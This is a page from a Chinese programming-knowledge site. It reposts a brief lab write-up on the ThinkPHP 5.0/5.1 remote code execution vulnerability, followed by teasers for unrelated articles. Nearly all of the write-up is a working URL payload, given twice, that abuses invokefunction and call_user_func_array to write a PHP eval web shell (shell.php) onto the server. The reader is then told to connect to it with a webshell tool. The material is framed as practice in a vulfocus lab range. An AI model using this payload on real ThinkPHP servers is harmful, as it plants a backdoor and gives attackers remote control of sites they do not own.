vulfocus靶场thinkphp命令执行cve-2018-1002015-编程知识

vulfocus靶场thinkphp命令执行cve-2018-1002015

news/2024/11/19 7:23:05/文章来源:https://blog.csdn.net/qq_27249127/article/details/138044727

thinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞，该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘＼’字符的方式调用任意方法利用该漏洞执行代码

开启靶场：

使用工具： thinkphp综合利用工具，

payload :

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php%20eval($_GET[cmd]);?>

然后使用webshell工具进行连接即可

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/637285.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

适配器模式【结构型模式C++】

适配器模式【结构型模式C++】

1.概述适配器模式是一种结构型设计模式， 又称为变压器模式、包装模式（Wrapper） 将一个类的接口变换成客户端所期待的另一种接口，从而使原本因接口不匹配而无法在一起工作的两个类能够在一起工作。 2.结构 Target：适配…

阅读更多...

python3如何提取汉字

python3如何提取汉字

采用正则表达式的方法对字符串进行处理。 str1 "｛我%$是，《速$.度\发》中 /国、人"（1）提取汉字汉字的范围为”\u4e00-\u9fa5“，这个是用Unicode表示的。 import re res1 .join(re.findall([\u4e00-\u9fa…

阅读更多...

排序 “叁” 之交换排序

排序 “叁” 之交换排序

目录 1. 基本思想 2.冒泡排序 2.1 基本思想 2.2 代码示例 2.3 冒泡排序的特性总结 3.快速排序 3.1 基本思想 🌵hoare版本 🌵挖坑法编辑 🌵前后指针版本编辑 3.2 快速排序优化 🌻三数取中法选key 3.4 快速排序…

阅读更多...

命理八字之电子木鱼的代码实现

命理八字之电子木鱼的代码实现

#uniapp# #电子木鱼# 不讲废话，上截图目录结构如下图功能描述： 点击一下，敲一下，伴随敲击声，可自动点击。自动点击需看视频广告，或者升级VIP会员。疑点解答： 即animation动画的时候&…

阅读更多...

git 基础配置

git 基础配置

一、下载git sudo apt install git -y二、用户信息配置 $ git config --global user.name "John Doe" $ git config --global user.email johndoeexample.com检查配置信息 git config --list三、ssh密钥生成 1、进入~/.ssh mkdir ~/.ssh cd ~/.ssh2、生成密钥 …

阅读更多...

计算机网络基础1--基础概念

计算机网络基础1--基础概念

1. IP地址 1.1 IPv4地址分为网络号和主机号地址块的第一个地址和最后一个地址通常不使用。广播地址为主机号全取1的情况。 2. 常用报文格式 2.0 ethernet协议 2.1 arp协议 2.2 ip协议 2.3 tcp协议 2.4 udp协议 2.5 icmp协议

阅读更多...

电磁兼容（EMC）：静电放电(ESD）抗扰度试验深度解读（三）

电磁兼容（EMC）：静电放电(ESD）抗扰度试验深度解读（三）

目录 1. 静电抗扰度试验标准试验程序定制的目的 2. 环境条件对充电量的影响 3. 环境级别与空气和接触放电的关系 4. 试验等级的选择 1. 静电抗扰度试验标准试验程序定制的目的保护设备免受静电放电影响的问题对制造厂和用户来说都是相当重要的。随着微电子元件的广泛应用…

阅读更多...

安装多个MySQL版本时如何连接到不同的数据库

安装多个MySQL版本时如何连接到不同的数据库

当安装多个版本的数据库时，不同版本的端口名不一样，可以使用以下命令进行连接 mysql -uroot -p数据库密码 -h主机名 -P端口号数据库主机名默认是localhost，端口号默认是3306，当安装多个版本数据库时，需要记住数据库的…

阅读更多...

ssm069端游账号销售管理系统+jsp

ssm069端游账号销售管理系统+jsp

端游账号销售管理系统的设计与实现摘要互联网发展至今，无论是其理论还是技术都已经成熟，而且它广泛参与在社会中的方方面面。它让信息都可以通过网络传播，搭配信息管理工具可以很好地为人们提供服务。针对端游账号销售信息管理混乱&…

阅读更多...

Android Studio实现页面跳转

Android Studio实现页面跳转

建立文件 temp.xml <?xml version"1.0" encoding"utf-8"?> <LinearLayout xmlns:android"http://schemas.android.com/apk/res/android"android:layout_width"match_parent"android:layout_height"match_parent"…

阅读更多...

利用RFID无线射频技术，实现商品防伪和溯源信息管理

利用RFID无线射频技术，实现商品防伪和溯源信息管理

近几年来，伴随着信息化产业的快速发展，企业对于产品在生产、流通、分销和零售等环节的实时跟踪和监管的需求日趋强烈。同时企业在经营过程中不可避免地要在不同区域实行差异化的经销商拿货价格，从而导致窜货现象时有发生，为企业带…

阅读更多...

为啥转化为可编辑面片后有这么多点和线

为啥转化为可编辑面片后有这么多点和线

可以删一下按住alt按移除可以删掉选择你要删的那些线按住alt点移除

阅读更多...

推荐文章

最新文章